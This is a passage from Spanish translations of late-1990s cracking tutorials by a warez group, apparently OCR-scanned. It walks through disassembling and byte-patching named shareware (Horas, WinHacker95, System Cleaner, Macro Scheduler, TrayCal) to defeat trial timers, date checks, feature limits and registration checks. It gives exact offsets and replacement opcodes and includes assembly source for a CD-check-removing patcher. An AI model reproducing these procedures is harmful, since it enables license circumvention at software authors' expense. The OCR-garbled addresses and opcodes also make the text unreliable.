hasta encontrar la última comparación como “test”, “jne” ect. Mira a 0O40C8F7, es a donde se 
saltará cuando el tiempo de evaluación a acabado. Asegurate de que la barra verde esta en 
0040C8F9 0F385BD000000 jne 0040C9BC y con esto verás la dirección de compensación bajo la 
pantalla, (GO Offset 0ODOBCEF9h), es donde puedes hacer el parche para HORAS.EXE. 


Paso 11.- Vuelve a FAR, ejecuta HIEW HORAS.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS, y pon BCF9, deberías ver lo siguiente: 


.0000C8F9: 0F34BD000000 


je  .00000C9BC =-=-------- (1) 


.0000CSFF: 8B4628 mov  eax,[esi][00028] 


.0000C902: 85C0 test eax,eax 


- Paso 12.- Aquí es donde puedes cambiar los bits, pulsa F3, pon 0F85, pulsa F9 para guardar 
los cambios y sal de HIEW. 


- Paso 13.- Ejecuta HORAS.EXE, ha caducado el tiempo de prueba? Voila! Has crackeado 
Horas 2.1*!! 


Parte 2.a: Como crackear el tiempo límite de WinHacker95 2.0b3 (con W32Dasm) 


- Paso 1.- Ejecuta WH95.EXE 


- Paso 2.- Verás el mensaje que dice que se ha acabado el tiempo de prueba, 
o que tendras que registrarte para que continue funcionando. (Apunta el 
mensaje) y sal del programa. 


- Paso 3.- Ejecuta el FAR, y ve al directorio de WH59S. 


- Paso 4.- Copia WH9S5.EXE a WH95.EXX (como backup) y copia 
WHO9S.EXE a WH95.W32 (para usar con W32Dasm), 


- Paso 5.- Ejecuta W32Dasm y desensambla WH95.W32. 


- Paso 6.- Una vez desensamblado, haz click en STRING DATA 
REFERENCE, busca la cadena “Y our trial period is over!”. Recuerda el mensaje 
y haz doble click sobre el. 


- Paso 7.- Cierra la ventana SDR, deberías ver la línea: 


* Possible StringData Ref from Data Obj ->"Y our trial peroid is over!" 


:00429977 6844D34400 push 0044D344 


:0042997C 8D8208020000 lea eax, dword ptr [edx+00000208] 


:00429982 50 push eax 


- Paso $.- Bien, pulsa la flecha hacia arriba hasta ver: 


* Referenced by a (U)jnconditional or (C)onditional Jump at Addresses: 


[:004298AE (C) 


- Paso 9.- Ahora pulsa la tecla página arriba 4 o 5 veces hasta ver: 


:004298AE 0F82A 1000000 3b 00429955 

:004298B4 7517 jne 004298CD 

:004298B6 51 push ecx 

:004298B7 8D8208020000 lea eax, dword ptr [edx+00000208] 


- Paso 10.- Mira a 004298AE, recuerdas la dirección a la que se hacía 
referencía? Es a donde se saltará cuando el tiempo límite ha pasado. Vamos a 


buscarla. Asegurate de que la barra vefde esta en :004298AE 0F82A 1000000 jb 
004299553 y verás la dirección de compensación bajo la pantalla, (Offset 
00028CAEh). Es donde puedes poner el parche para WH9S.EXE. 


- Paso 11.- Vuelve al FAR, ejecuta HIEW WH9S.EXE, pulsa F4 para 
seleccionar modo descodificador (ASM), pulsa FS y pon 28CAE. Deberías ver 


algo como: 
.000298AE: 0F32A 1000000 jJb  .000029935 oa<o---- (1) 
.000298B4: 7517 jne .0000298CD =--------- (2) 
.000298B6: 51 push ecx 


- Paso 12.- Aquí es donde puedes cambiar los bits, pulsa F3, pon 
EB0090909090, y pulsa F9 para guardar. EBOO dirá que no salte pero que 
continue en la línea siguiente, y 90909090 hará de ellos NOP, lo tienes? Sal de 
HIEW. 


- Paso 13.- Ejecuta WH9SEXE, ha caducado? Voila! Has crackeado el 
WHDS 2.0b3!! 


Parte 2.b: Como crackear WH095 2.0b3 (al introducir cualquier n* de 
serie) 


- Paso 1.- Ejecuta WH9S.EXE. 


- Paso 2.- Pon “TKC/Pc “97” en Nombre, en compañía “PC “97”, y en n* “12345” y pulsa en 
registrar. 


- Paso 3.- Has visto el mensaje de error. (Apuntalo) y sal del programa. 
- Paso 4.- Ejecuta el FAR, y ve al directorio de WHO9S5. 


- Paso 5.- Copia WH9S.EXE a WH95.EXX (como backup), y copia WH9S5.EXE a WH95.W32 
(para usar con W32Dasm). 


- Paso 6.- Ejecuta W32Dasm y desensambla WH95.W32. 


- Paso 7.- Una vez desensamblado, haz click en STRING DATA REFERENCE, busca la 
cadena “Invalid Serial Number!”. (Recuerda este mensaje de error) Haz doble click en el. 


- Paso 8.- Cierra la ventana SDR, deberías ver la línea: 
* Possible StringData Ref from Data Obj ->"Invalid Serial Number!" 
:00429719 68E0D24400 push 0044D2E0 


:0042971E 8D4DF0 lea ecx, dword ptr [ebp-10] 


- Paso 9.- Bien, ahora debes buscar la última comparación como CMP, JNE, JE, TEST ect, 
antes del error de la cadena. Pulsa la flecha hacia arriba hasta encontrar: 


:004296FB 7474 je 00429771 
:004296FD 8B4DF0 mov ecx, dword ptr [ebp-10] 


:00429700 C7416C00000000 mov [ecx+6C], 00000000 


- Paso 10.- Ahora sabes a donde saltará cuando has introducido un código erróneo. Vamos a 
probar si todo funciona cuando cambiamos “je” por “j¡ne” o “eb”. Asegurate de que la barra verde 
esta en :004296FB 7474 je 00429771, verás la dirección de compensación bajo la pantalla, 


(OOffset 0O028AFBh). Es donde puedes hacer el parche para WH95.EXE. 


- Paso 11.- Vuelve a FAR, ejecuta HIEW WH9S5.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa F5 y pon 28AFB. Deberías ver algo como: 


.000296FB: 7474 je .000029771  =--------- (1) 


.000296FD: 8B4DF0 mov  ecx,[ebp][-0010] 


00029700: C7416C00000000 mov  d,[ecx][0006C],000000 


- Paso 12.- Aquí es donde puedes cambiar los bits, pulsa F3, pon EB, pulsa F9 para grabar y sal 
de HIEW. 


- Paso 13.- Ejecuta WH9S5.EXE, pon cualquier código, funciona? No te mees, continúa. 
- Paso 14.- Ejecuta de nuevo WH95.EXE. 


- Paso 15.- Pon “TKC/PC “97” en nombre, en compañía “PC “97”, y en n” de serie “12345” y 
pulsa registrar. 


- Paso 16.- Verás otro mensaje de error. (Apuntalo) y sal del programa. 


- Paso 17.- Vuelve al W32Dasm, haz click en STRING DATA REFERENCE, y busca la 
cadena “Error 1000: Invalid Serial Number!”. Recuerda este mensaje, haz doble click en el. 


- Paso 18.- Cierra la ventana SDR, deberías ver la línea: 
* Possible StringData Ref from Data Obj ->"Error 1000: Invalid Serial..”" 
:004229C3 686CCE4400 push 0044CE6C 


:004229C8 E8C3030000 call 00422D90 


- Paso 19.- Bien, ahora debes buscar la última comparación como CMP, JNE, JE, TEST, ect 
antes del error de la cadena. Pulsa la flecha hacia arriba hasta encontrar: 


:004229BC 7424 je 004229E2 
:004229BE 6A3B push 0000003B 


:004229C0 8B4DEC mov ecx, dword ptr [ebp-14] 


- Paso 20.- Ahora sabes a donde saltará el programa cuando has introducido un código erróneo. 
Vamos a probar si todo funcionará cuando cambiamos “je” por ¡ne” o “eb”. Asegurate de que la 
barra verde esta en :004229BC 7424 je 004229E2, verás la dirección de compensación debajo de 


la pantalla, (EOffset 00021DBCh). Es donde puedes poner el parche para WH95.EXE. 


- Paso 21.- Vuelve al FAR, ejecuta HIEW WH95.EXE, pulsa F4 para activar modo 
descodificador (ASM), pulsa F5 y pon 21DBC. Deberías ver algo como:+ 


.000229BC: 7424 je  .0000229E2 ==-=------ (1) 
.000229BE: 6A3B push 03B 
.000229C0: 8B4DEC mov  ecx,[ebp][-0014] 


- Paso 22.- Aquí es donde puedes cambiar los bits, pulsa F3, pon EB, pulsa F9 para grabar y sal 
de HIEW. 


- Paso 23.- Ejecuta WH95.EXE, pon cualquier código y... Voila! Has crackeado 2.0b3!! 
Bien, suficiente por ahora. Espero que te hallas divertido con este tutorial tanto como yo lo hice. 


Te vere la próxima vez en el tutorial $4. 


Que te divietas! 
The Keyboard Caper, 
The Founder of PhRoZeN CreW “94 - “977 


27-8-1997 


tKC CRACKING TUTOR, LECCIÓN 4 


Hi dudes! 


Cuatro meses sin tutorial! Phew, pero como puedes ver estoy de vuelta en la escena del cracking 
(yea, estoy de vuelta en tu PC, no estas contento?) ] . Ok, lets rock, en este tutorial te enseñare 
como eliminar límites de intervalos y como activar rasgos mutiladores en algunas aplicaciones (y 
como registrar tu bebé) ] . 


(Todavía no puedo hablarte sobre Soft-ICE, sigo con el portátil). En el próximo tutorial 
hablaremos de IDA (Interactive Disassembler). 


Discúlpame por mis errores grámaticales, espero que entiendas este pedazo! ] 


Herramientas: 


Necesitaras las siguientes: (Yo usé estas herramientas, y doy por hecho que tú también las 
usarás): 


- W32Dasm 8.9 o superior. 


- Hacker's View 5.66 (E-mail: sen Osuslikov.kemerovo.su) 


- FART1.50b (ftp://ftp.elf.stuba.sk/pub/pc/utilfile/farl140b.exe) Es realmente bueno! O Windows 
Commander 3.50 beta 5 (http://www.ghisler.com) 


Contenidos: 


1) a. Como crackear el tiempo de evaluación de System Cleaner 1.21 (con W32Dasm)URL: 
http://infortech.reedes.com 


b. Como desviar el NAG sobre fecha inválida en System Cleaner 1.21 (con W32Dasm) 


URL: http://infortech.reedcs.com 


2) a. Como activar rasgos mutiladores de Macro Schedular 4.3.11 (con W32Dasm) 


URL: http://www.mjnet.com 


3) Como crackear TrayCal 1.0 (para introducir cualquier código) 


URL: http://www.spaeder.com 


4) Porque copio ficheros *.EXE a *.W32. 


5) Código fuente ASM para parches, por Nop/PC “97 


Parte 1.a: Crackear el tiempo de evaluación de System Cleaner 1.21 
(con W32Dasm) 


- Paso 1.- Ejecuta System Cleaner.EXE 


- Paso 2.- Ahora verás el mensaje de error que dice que el período de evaluación ha pasado. 
(Apunta el mensaje) y sal del programa. 


- Paso 3.- Sigamos. 
- Paso 4.- Ejecuta WC, y ve al directorio de System Cleaner. 


- Paso 5.- Copia SystemCleaner.EXE a Systemcleaner.EXX (como backup) y copia 
SystemCleaner.EXE a SystemCleaner.W32 (para usar con W32Dasm) 


- Paso 6.- Ejecuta W32Dasm y desensambla SystemCleaner.W32. 


- Paso 7.- Una vez desensamblado, haz click en STRING DATA REFERENCE, busca la 


cadena “The trial period has ended. Please...”. (Recuerda este mensaje de error) Haz doble click 
en el. 


- Paso 8.- Cierra la ventana SDR, deberías ver la línea: 
:00464BB6 668B0DE44B4600 mov cx, word ptr [00464BF4] 
:00464BBD B202 mov dl, 02 
* Possible StringData Ref from Code Obj ->"The trial period has ended. Please " 
->"register this software!" 
- Paso 9.-Bien, pulsa la flecha hacia arriba hasta encontrar: 
:00464BAS 53 push ebx 
:00464BA9 8BD8 mov ebx, eax 
:00464BAB 80BB0C01000000 cmp byte ptr [ebx+0000010C], 00 
:00464BB2 741C je 00464BDO 


:00464BB4 6A00 push 00000000 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:00464B4F(C) 


- Paso 10.- Mira sobre la referencia del salto en 00464B4F (C), pulsa 2 o 3 veces Página arriba 
hasta ver: 


:00464B4F 7065 jo 00464BB6 
Y mira abajo hasta ver: 


:00464B54 64 BYTE 064h 


Si ves la cadena “BYTE xxxh” ignorala!! No es un salto real, son solo cadenas, bien, vuelve a la 
dirección 00464BAS8. Ahora encontraras una comparación, mira a 464BB2, es a donde se saltará 
cuando el tiempo de evaluación a caducado. Let's try. 


Asegurate de que la barra verde esta en 00464BB2 741C je 00464BDO y verás la dirección de 
compensación bajo de la pantalla, (E Offset 0O0063FB2h). Es donde puedes hacer el parche para 
SystemCleaner.EXE. 


- Paso 11.- Vuelve a WC, ejecuta HIEW SYSTEM-1.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS y pon 63FB2. Deberías ver algo como: 


.00064BB2: 741C je  .000064BDO ---------- (1) 
.00064BB4: 6A00 push 000 
.00064BB6: 668B0DE44B4600 mov  cx,[000464BK4] 


- Paso 12.- Aquí es donde puedes cambiar los bits, pulsa F3, pon EB, pulsa F9 para grabar y sal 
de HIEW. 


- Paso 13.- Ejecuta SystemCleaner.EXE, a caducado el tiempo de evaluación, Voila! Lo has 
hecho!!. 


Parte 1.b: Desviar el NAG sobre fecha inválida en System Cleaner 1.21 
(con W32Dasm) 


(Esto se usa sólo sí has cambiado la fecha de 12/25/98, por ejemplo a 12/25/97. Veras un NAG 
que te dice “ The system clock has been moved back. Please reset system clock to correct blah 
blah...”). 


- Paso 1.- Ejecuta System Cleaner.EXE 


- Paso 2.- Ahora veras el mensaje de error que dice que la fecha del sistema ha sido 


modificada. (Apunta el mensaje) y sal del programa. 
- Paso 3.- Sigamos. 
- Paso 4.- Ejecuta WC, y ve al directorio de System Cleaner. 


- Paso 5.- Copia SystemCleaner.EXE a Systemcleaner.EXX (como backup) y copia 
SystemCleaner.EXE a SystemCleaner.W32 (para usar con W32Dasm) 


- Paso 6.- Ejecuta W32Dasm y desensambla SystemCleaner.W32. 


- Paso 7.- Una vez desensamblado, haz click en STRING DATA REFERENCE, busca la 
cadena “The system clock has been moved back”. (Recuerda este mensaje de error) Haz doble 
click en el. 


- Paso 8.- Cierra la ventana SDR, deberías ver la línea: 
:00464E56 668B0D884E4600 mov cx, word ptr [00464E88] 
:00464E5D B201 mov dl, 01 
* Possible StringData Ref from Code Obj ->"The system clock has been moved " 


->"back. Please reset system 
clock ->"to correct time 
before re-ruming " 


- Paso 9.-Bien, pulsa la flecha hacia arriba hasta encontrar: 
:00464E48 53 push ebx 
:00464FE49 8BD8 mov ebx, eax 
:00464E4B 80BB0C01000000 cmp byte ptr [ebx+0000010C], 00 


:00464E52 7421 je 00464E75 


:00464E54 6A00 push 00000000 


:00464E56 668B0D884E4600 mov cx, word ptr [00464E88] 


- Paso 10.- Mira a 00464E52, es a donde se saltará cuando el reloj ha sido cambiado. Let's see. 
Asegurate de que la barra verde esta en 00464E52 7421 je 00464E75 y verás la dirección de 
compensación bajo la pantalla, (Offset 0O064252h). Es donde puedes hacer el parche de 
SystemCleaner.EXE. 


- Paso 11.- Vuelve a WC, ejecuta HIEW SYSTEM-1.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS y pon 63FB2. Deberías ver algo como: 


.00064E32: 7421 jmps .000064E75  ---------- (1) 
.00064E34: 6A00 push 000 
.00064E36: 668B0D884E4600 mov  cx,[000464E88] 


- Paso 12.- Aquí es donde puedes cambiar los bits, pulsa F3, pon EB, pulsa F9 para grabar y sal 
de HIEW. 


- Paso 13.- Ejecuta SystemCleaner.EXE, se queja, Voila! Lo has hecho!!. 


Parte 2: Activar rasgos mutiladores en Macro Schedular 4.3.11 (con 
W32Dasm) 


- Paso 1.- Ejecuta MSCHED.EXE 


- Paso 2.- Intenta añadir más macros y te dira que tiene un límite de 2 macros. Apunta este 
mensaje y sal del programa. 


- Paso 3.- Ejecuta WC, y ve al directorio de MSCHED. 


- Paso 4.- Copia MSCHED.EXE a MSCHED.EXX (como backup) y copia MSCHED.EXE a 
MSCHED.W32 (para usar con W32Dasm) 


- Paso 5.- Ejecuta W32Dasm y desensambla MSCHED.W32. 


- Paso 6.- Una vez desensamblado, haz click en STRING DATA REFERENCE, busca la 
cadena “Unregistered copies of MS are limited to...”. (Recuerda este mensaje de error) Haz doble 
click en el. 


- Paso 7.- Cierra la ventana SDR, deberías ver la línea: 
* Possible StringData Ref from Code Obj ->"Unregistered copies of Macro.." 
->"have a limit of 20 lines per..” 


:00448AED B860954400 mov eax, 00449560 


- Paso 8.-Bien, pulsa la flecha hacia arriba hasta encontrar: 


:00448ACA 7530 jne 00448 AFC 

:00448 ACC 8B8370020000 mov eax, dword ptr [ebx+00000270] 
:00448AD2 8B80FC000000 mov eax, dword ptr [eax+000000éFC] 
:00448AD8 8B10 mov edx, dword ptr [eax] 
:00448ADA FF3210 call [edx+10] 

:00448ADD 83F813 emp eax, 00000013 

:00448AE0 7ElA jle 00448 AFC 

:00448AE2 6A00 push 00000000 


- Paso 9.- Mira a las direcciones 00448ACA y 00448AEO, es a donde se saltará cuando se 
queja. Let's find it. Asegurate de que la barra verde esta en 00448ACA 7530 ¡ne 00448AFC y 


verás la dirección de compensación bajo la pantalla, (E Offset 0O047ECAh). Es donde puedes 


hacer el parche para MSCHED.EXE. 


- Paso 10.- Vuelve a WC, ejecuta HIEW MSCHED.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS y pon 63FB2. Deberías ver algo como: 


.00048ACA: 7530 


.00048ACC: 8B8370020000 


.00048AD2: 8B80FC000000 


.00048AD38: 8B10 


.00048ADA: FF5210 


.00048ADD: 83F813 


.00048AEO: 7ElA 


jne .000048AFC =--------- (1) 


mov  eax,[ebx][000000270] 


mov  eax,[eax][0000000FC] 


mov  edx,[eax] 


call d,[edx][00010] 


cmp  eax,013 


jle .000048AFC  =-=-------- (2) 


- Paso 11.- Aquí es donde puedes cambiar los bits, pulsa F3, pon EB y ve hacia abajo hasta 
T7ElA (Offset 47EEO), pon EB, pulsa F9 para grabar y sal de HIEW. 


- Paso 12.- Todavía no esta listo! Abre la ventana SDR y haz doble click en “Unregistered 


copies...” otra vez. 


- Paso 13.- Cierra la ventana SDR, y deberías ver la línea: 


* Possible StringData Ref from Code Obj ->"Unregistered copies of Macro.." 


:0044DB9E B86CDC4400 


->"have a limit of 20 lines per..” 


mov eax, 0044DC6C 


- Paso 14.- Bien, pulsa la flecha arriba hasta encontrar: 


:0044DB7D 752€ 


:0044DB7F 8B83D4090000 


:0044DB85 8B80FC000000 


:0044DB8B 8B 10 


:0044DB8D FF5210 


:0044DB90 48 


:0044DB91 7E18 


jne 0044DBAB 
mov eax, dword ptr [ebx+000009D4] 
mov eax, dword ptr [eax+000000FC] 
mov edx, dword ptr [eax] 
call [edx+10] 
dec eax 


jle 0044DBAB 


- Paso 15.- Mira a las direcciones 0044DB7D y 0044DB91. Es a donde se saltará cuando se 
queje. Let's find out. Asegurate de que la barra verde esta en 0044DBD7D 752C jne 0044DBAB 
y verás la dirección de compensación bajo la pantalla, (Offset 0O04CF7Dh). Es donde puedes 


hacer el parche para MSCHED.EXE. 


- Paso 16.- Vuelve a WC, ejecuta HIEW MSCHED. Pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS y pon 4CF7D. Deberías ver algo como: 


.0004DB7D: 752C 


.0004DB7F: 8B83D4090000 


.0004DB85: 8B80FC000000 


.0004DB8B: 8B10 


.0004DB8D: FF5210 


.0004DB90: 48 


.0004DB91: 7E18 


jne .00O004DBAB — ---------- (1) 
mov  eax,[ebx][0000009D4] 
mov  eax,[eax][0000000FC] 

mov  edx,[eax] 

call d,[edx][00010] 

dec  eax 


jle .OO004DBAB  ---------- 0) 


- Paso 17.- Aquí es donde puedes cambiar los bits, pulsa F3, pon EB y ve hacia abajo hasta 
7E18 (Offset 47F91), pon EB, pulsa F9 para grabar y sal de HIEW. 


- Paso 18.- Todavía no esta listo! Abre la ventana SDR y haz doble clic sobre “Unregistered 
copies..” otra vez. 


- Paso 19.- Cierra la ventana SDR, y deberías ver la línea: 


* Possible StringData Ref from Code Obj ->"Unregistered copies of Macro.." 
->"have a limit of 20 lines per.." 


:00450D3F B8001D4500 mov eax, 00451D00 


- Paso 20.- Bien, pulsa la flecha hacia arriba hasta ver: 
:00450D21 74CC je 00450CEF 
:00450D23 8BC7 mov eax, edi 
:00450D25 ES6635FBFF call 00404290 
:00450D2A ESC919FBFF call 004026F8 
:00450D2F 83FB14 emp ebx, 00000014 


:00450D32 7E1A jle 0O450D4E 


- Paso 21.- Mira a la dirección 00450D32. Es a donde se saltará cuando se queje otra vez. Let's 
find out. Asegurate de que la barra verde esta en 00450D32 7E1A jle 00450D4E y verás la 


dirección de compensación bajo la pantalla, (Offset 00050132h). Es donde puedes hacer el 
parche para MSCHED.EXE. 


- Paso 22.- Vuelve a WC, ejecuta HIEW MSCHED.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS, y pon 4CF7D. Deberías ver algo como: 


.00050D32: 7E1A jle .000050D4E  ---------- (4) 
.00050D34: 6A00 push 000 
.00050D36: 668B0DF41C4500 mov  cx,[000451CF4] 


- Paso 23.- Aquí es donde puedes cambiar los bits, pulsa F3, pon EB, pulsa F9 para guardar los 
cambios y sal de HIEW. 


- Paso 24.- Todavía no esta listo! (una vez más)] . Abre la ventana SDR y haz doble click 
sobre “Unregistered copies...” otra vez. 


- Paso 25.- cierra la ventana SDR, deberías ver la línea: 
* Possible StringData Ref from Code Obj ->"Unregistered copies of Macro.." 
->"have a limit of 20 lines per..” 


:00452D25 B8E82F43500 mov eax, 00452FE8 


- Paso 26.- Bien, pulsa la flecha hacia arriba hasta ver: 
:00452D01 7531 jne 00452D34 
:00452D03 8B45FC mov eax, dword ptr [ebp-04] 
:00452D06 8B80D4090000 mov eax, dword ptr [eax+000009D4] 
:00452D0C 8B80FC000000 mov eax, dword ptr [eax+000000FC] 


:00452D12 8B 10 mov edx, dword ptr [eax] 


:00452D14 FF5210 call [edx+10] 
:00452D17 48 dec eax 


:00452D18 7E1A jle 00452D34 


- Paso 27.- Mira a las direcciones 00452D01 y 00452D18. Es a donde saltará cuando se queje. 
Let's find out. Asegurate de que la barra verde esta en 00452D01 7531 ¡ne 00452D34 y verás la 
dirección de compensación bajo la pantalla, (Offset 00052101h). Es donde puedes hacer el 
parche para MSCHED.EXE. 


- Paso 28.- Vuelve a WC. Ejecuta HIEW MSCHED.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS y pon 52101. Deberías ver algo como: 


.00052D01: 7531 jne .000052D34 ---------- d) 
.00052D03: 8B45FC mov  eax,[ebp][-0004] 
.00052D06: 8B80D4090000 mov  eax,[eax][0000009D4] 
.00052D0C: 8B80FC000000 mov  eax,[eax][0000000FC] 
.00052D12: 8B10 mov  edx,[eax] 

.00052D 14: FEFS5210 call d,[edx][00010] 

.00052D 17: 48 dec  eax 

.00052D18: TELA jle .000052D34 ---------- Q) 


- Paso 29.- Aquí es donde puedes cambiar los bits, pulsa F3, pon EB y ve hacia abajo hasta 
T7ElA (Offset 52118), pon EB, pulsa F9 para grabar y sal de HIEW. 


- Paso 30.- Finalmente, ejecuta MSCHED.EXE e intenta añadir más macros o más de 20 líneas 
en un script. Funciona? Kewl, lo has hecho!! 


Parte 3: Crackear TrayCal 1.0 (para introducir cualquier código) 
- Paso 1.- Ejecuta TRAYCAL.EXE 


- Paso 2.- Pon tu nombre y algún código, veras el mensaje de error que te dice que has 
introducido un código inválido. (Apunta el mensaje) y sal del programa. 


- Paso 3.- Ok, sal del programa. 
- Paso 4.- Ejecuta WC, y ve al directorio de TrayCal. 


Paso 5.- Copia TRAYCAL.EXE a TRAYCAL.EXX (como backup) y copia TRAYCAL.EXE 
a TRAYCAL.W32 (para usar con W32Dasm) 


- Paso 6.- Ejecuta W32Dasm y desensambla TRAYCAL.W32. 


- Paso 7.- Una vez desensamblado, haz click en STRING DATA REFERENCE, busca la 
cadena “Sorry, invalid registration code...”. (Recuerda este mensaje de error) Haz doble click en 
el. 


- Paso 8.- Cierra la ventana SDR, deberías ver la línea: 
:0043FD30 7E1A jle 0043 FD4C 
:0043FD32 6A00 push 00000000 
:0043FD34 668B0DE4FF4300 mov cx, word ptr [0043FFE4] 


:0043FD3B 33D2 xor edx, edx 


* Possible StringData Ref from Code Obj ->"Sorry, invalid registration code." 


Mira a la dirección 0043FD30, es a donde saltará cuando introduces un código erróneo. Let's try. 
Asegurate de que la berra verde esta en 0043FD30 7E1A ¡le 0043FD4C, y verás la dirección de 
compensación bajo la pantalla, (Offset 0003F130h). Es donde puedes hacer el parche para 
TRAYCAL.EXE 


- Paso 9.- Vuelve a WC, ejecuta HIEW TRAYCAL.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS y pon 3F130, con lo que deberías ver algo como: 


.0003FD30: 7E1A jle .00003FD4C  ---------- (1) 
.0003FD32: 6A00 push 000 
.0003FD34: 668B0DE4FF4300 mov  Cx,[00043FFE4] 


.0003FD3B: 33D2 xor  edx,edx 


- Paso 10.- Aquí es donde puedes cambiar los bits, pulsa F3, pon EB, pulsa F9 para guardar los 
cambios y sal de HIEW. 


- Paso 11.- Ejecuta TRAYCAL.EXE, funciona? Nah, compra la mierda en el registro! 
- Paso 12.- Vuelve a W32Dasm, pulsa otra vez en “Sorry, invalid registration...” 
- Paso 13.- Cierra la ventana SDR, deberías ver la línea: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


:0043FE34(C) 


:0043FF1B 6A00 push 00000000 


:0043FF1D 668B0DE4FF4300 mov cx, word ptr [0043FFE4] 


:0043FF24 33D2 xor edx, edx 
* Possible StringData Ref from Code Obj ->"Sorry, invalid registration code." 
Ven arriba que viene de un salto en las direccion? : 0043FE34(C) 


Presionen la tecla PgUp 2 o 3 veces u verán: 


:0043FE34 0F35E1000000 jne 0043FF1B 


* Possible StringData Ref from Code Obj ->"SoftwarelSpaeder" 


:0043FE3A 8B0DDC194400 mov ecx, dword ptr [004419DC] 


- Paso 14.- Mira a la dirección 0043FE34, sabemos que esto compara otra vez despues de 
introducir un nuevo código. Now let's try. Asegurate de que la barra verde esta en 0043FE34 
0F85E1000000 jne 0043FF1B y verás la dirección de compensación bajo la pantalla, (Ooffset 
0003F234h). Es donde puedes hacer el parche para TRAYCAL.EXE. 


- Paso 15.- Vuele a WC, ejecuta HIEW TRAYCAL.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS y pon 3F234. Deberías ver algo como: 


.0003FE34: 0F85E 1000000 jne .00003FF1B  ---------- (1) 
.0003FE3A: 8B0DDC194400 mov  ecx,[0004419DC] 
.0003FE40: B201 mov  dl,001 


.0003FE42: A128D84300 mov  eax,[00043D828] 


- Paso 16.- Aquí es donde puedes cambiar los bits, pulsa F3, pon 0F84, pulsa F9 para guardar 
los cambios y sal de HIEW. 


- Paso 17.- Ejecuta TRAYCAL.EXE, funciona? Kewl, lo has registrado!! 


Parte 4: Por que copio ficheros *.EXE a *.W32? 


Sé que algunas personas estan preguntando porque copio ficheros *.EXE a *.W32. Fácil.. Si usas 
* EXX algunas veces el programa no funciona, luego no puedo copiar de *.EXX a *.EXE. 
Cuando uso *.W32 puedo hacer el parche en ficheros *.EXE cuando todavía estan siendo usados 
por W32Dasm, por consiguiente usa ahora los ficheros *.W32... Ahora dime como puedo hacer 
el engaño! ] Recuerda guardar los ficheros desensamblados antes de salir de W32Dasm, la 
próxima vez no tendras que desensamblarlo. 


Parte 5: Código fuente ASM para un parche, por Nop/PC “97 


; Patcher by Nop [Pc] - SourceCode 100% free 


; To use with A86: 


] A86 CrkNop.asm 


; To use with TASM: 


, tasm CrkNop.asm 


: tlink /t CrkNop.obj 


; Greetz to all members of the Scene 


.MODEL TINY 


.CODE 


.286 


ORG 100h 


start: 


mov  ah,9 ; pb Show Title p 


mov dx, offset MainTitle 


int 


int 


jnb 


int 


int 


21h 


mov 


mov 


21h 


Ok 


mov 


mov 


216 


mov 


21h 


mov 


mov 


mov 


mov 


ax, 3D02h ; b Open File p 


dx, offset filename 


ah, 9 ; pb File Not Found pb 


dx, offset error 


ax, 4C01h ; p Exit with error pb 
bx, ax ; pb Move pointer p 

ax, 4200h 

cx, 0 ; segment 

dx, 565 ; Offset 


int 21h 


mov ax, 4000h ; p Write values b 


mov cx, 1l ; number of bytes to write 


mov dx, offset BytesToWrite 


int 21h 

mov ax, 3E00h ; pb Close file p 
int 21h 

mov  ah,9 ; b Show msg b 


mov dx, offset done 


int 21h 
mov ax, 4C00h ; p All Done And Exit pb 
int 21h 


MainTitle  dbODh,0Ah 


error 


filename 


db ' ÚBBBRBRBEBBBOO  UUÚRBR8888BOÚ ÚBBBBBBEBBOU' ODh,O0Ah 
db'Ú Ú Ú ÚUÚ UÚ'0Dh,0Ah 


A 


ÚU Ú UÚ'0Dh,0Ah 


5 
a 
o 
o 
o 
o 


EN 


do'Ú Ú Ú Ú Ú ÚUÚ UUÚ'0Dh,0Ah 


S 
E 
E 
E 
E 
a» 
a» 
a» 
a» 


88888 '¡ODh,0Ah 
dbsti 0 -U «0 ÚÚ 6Ú proudly',ODh,0Ah 
db ' ÚUVUUOUDVUVÚ BÚUVUUUVUUVOÚS ÚUVUOÚ presents',ODh,0Ah 


db ' VUVUUOUUUUUUUUUUC UL OLCUUCULUVUUUUVUOOOS* ODh,0Ah 


db 'Ú8 BÚ'ODh,0Ah 
db 'Ú PROG NAME Ú' ODh,0Ah 
db 'Ú REMOVE CD-CHECK Ú',ODh,0Ah 
db 'Ú BY NOP Ú',0Dh,0Ah 
db 'ÚU UÚ'ODh,0Ah 


db ' BREBEBB BERE BE BEBER RE BREA BEREBER REBREREREEBEE6 ',ODh,OAh 


db ODh,0Ah,$' 


db ' p ERROR: Hm... problem with file ? '¡ODh,0Ah,'$' 


db 'FILE.EXE',0 


done db'p Enjoy ! , ODh,0Ah,'$' 


BytesToWrite db OEBh 


end start 


Ok, suficiente por ahora. Espero que te hayas divertido con este tutorial más de lo que yo lo 
hice!J 


Te veré la próxima vez en el Tutorial 45! 


Gracias a Taha, Taylor, ThatDude, Archimede, PowerLord y a todo el mundo en el PC!! 


Este tutorial esta dedicado a Taha... sin ella no podría ir a mucho más en el futuro, y si no fuera 
por ella, yo no podría volver a P.C. nunca. Así que estaré en P.C., larga vida para PhRoZeN 
CreW!! Thanx babe J 


Puedes encontrarme en *pc98 o mandame un email a tkcO goplay.com(escribe en inglés) 


Que te diviertas! 


The keyboard Caper, 


El fundador de PhRoZeN CreW “94 - “98 


25-12-1997 


tKKC CRACKING TUTOR, LECCIÓN 5. 


Hi ya! 


Phew, aquí estamos otra vez aprendiendo a crackear a tus bebes! Demasiadas abejas!! Cought 
Ok, let's rock, en este tutorial te enseñare como jugar con tu registro WIN y como matar pausas. 
J 


Todavía nada sobre Softlce, todavía estoy con mi pequeño portátil, pero tendré una nueva 
máquina pronto, ya cantaremos entonces! ] 


Discúlpame por mis errores grámaticales, espero que entiendas este pedazo! ] 

Ok, let's rave! 

Herramientas: 

Necesitaras lo siguiente: (Yo usé estas herramientas, y doy por hecho que tú también las usarás): 
